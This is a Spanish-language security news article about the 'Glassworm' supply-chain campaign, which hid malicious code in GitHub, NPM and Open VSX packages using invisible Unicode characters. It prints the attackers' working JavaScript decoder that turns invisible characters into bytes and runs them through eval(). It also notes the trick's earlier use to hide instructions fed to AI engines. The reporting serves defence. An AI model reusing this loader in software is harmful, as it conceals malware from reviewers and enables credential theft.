El ataque de cadena de suministro utiliza código Unicode invisible para evadir la detección.

✍️ OpenClawRadar📅 Publicado: 15 de marzo de 2026🔗 Source
El ataque de cadena de suministro utiliza código Unicode invisible para evadir la detección.
Ad

Investigadores de seguridad de Aikido Security descubrieron un ataque de cadena de suministro que utiliza código Unicode invisible para ocultar funciones maliciosas en paquetes subidos a GitHub, NPM y Open VSX. El grupo atacante, apodado Glassworm, subió 151 paquetes maliciosos a GitHub del 3 al 9 de marzo de 2026.

Cómo funciona el código invisible

Los paquetes maliciosos utilizan caracteres Unicode de Áreas de Uso Público (también llamadas Acceso de Uso Público) que son invisibles cuando se visualizan en editores, terminales e interfaces de revisión de código. Aunque la mayor parte del código parece normal, las funciones y cargas útiles maliciosas se representan usando estos caracteres invisibles, lo que hace ineficaces las revisiones manuales de código y las defensas tradicionales.

Los caracteres Unicode invisibles representan cada letra del alfabeto estadounidense cuando son procesados por computadoras, pero se muestran como espacios en blanco o líneas vacías para los humanos. Los intérpretes de JavaScript pueden leer y ejecutar estos caracteres como código normal.

Implementación técnica

En un paquete analizado, los atacantes codificaron una carga útil maliciosa usando caracteres invisibles. El código incluye una función decodificadora que extrae los bytes ocultos y los pasa a eval():

const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));

La cadena de comillas invertidas pasada a s() parece vacía en los visores, pero contiene caracteres invisibles que se decodifican en una carga útil maliciosa completa. En incidentes anteriores, las cargas útiles decodificadas obtenían y ejecutaban scripts de segunda etapa usando Solana como canal de entrega para robar tokens, credenciales y secretos.

Ad

Características del ataque

Los paquetes maliciosos son particularmente difíciles de detectar porque:

  • Las porciones visibles del código son de alta calidad y realistas
  • Los cambios circundantes incluyen ajustes en la documentación, incrementos de versión, pequeñas refactorizaciones y correcciones de errores
  • Los cambios son estilísticamente consistentes con los proyectos objetivo
  • Los investigadores sospechan que se utilizan LLM para generar paquetes convincentemente legítimos

Esta técnica Unicode se utilizó por primera vez en 2024 para ocultar instrucciones maliciosas alimentadas a motores de IA, y desde entonces se ha adaptado para ataques de malware tradicionales. Los 151 paquetes detectados probablemente representan una pequeña fracción de la campaña, ya que muchos han sido eliminados desde la carga inicial.

📖 Leer la fuente completa: HN AI Agents

Ad

👀 Ver también

Claude Cage: Entorno de Pruebas Docker para la Seguridad del Código de Claude
Seguridad

Claude Cage: Entorno de Pruebas Docker para la Seguridad del Código de Claude

Un desarrollador creó un contenedor Docker llamado Claude Cage que aísla Claude Code en una única carpeta de trabajo, impidiendo el acceso a claves SSH, credenciales de AWS y archivos personales. La configuración incluye reglas de seguridad y toma unos 2 minutos si tienes Docker instalado.

OpenClawRadar
PolyRange: Benchmark Ofensivo de IA Resistente a la Contaminación con Objetivos Generados por LLM
Seguridad

PolyRange: Benchmark Ofensivo de IA Resistente a la Contaminación con Objetivos Generados por LLM

PolyRange v1.0 es un benchmark de código abierto (licencia MIT) autohospedable que genera objetivos web frescos en cada ejecución para evitar la contaminación de los datos de entrenamiento. Incluye 84 clases derivadas de WSTG en todas las categorías OWASP, dos niveles de defensa y backends reales.

OpenClawRadar
Tablero en vivo de herramientas OpenClaw expuestas
Seguridad

Tablero en vivo de herramientas OpenClaw expuestas

Tablero que muestra los paneles de control expuestos de las herramientas OpenClaw como Moltbot y Clawdbot.

OpenClawRadar
Ward: Herramienta de código abierto intercepta instalaciones de npm para bloquear ataques a la cadena de suministro para usuarios de Claude Code
Seguridad

Ward: Herramienta de código abierto intercepta instalaciones de npm para bloquear ataques a la cadena de suministro para usuarios de Claude Code

Ward es una herramienta de código abierto que se integra en los gestores de paquetes para verificar cada paquete antes de que se ejecuten los scripts de instalación. Cuando Claude Code ejecuta npm install, Ward examina automáticamente los paquetes en busca de malware, typosquats, scripts sospechosos y anomalías de versión.

OpenClawRadar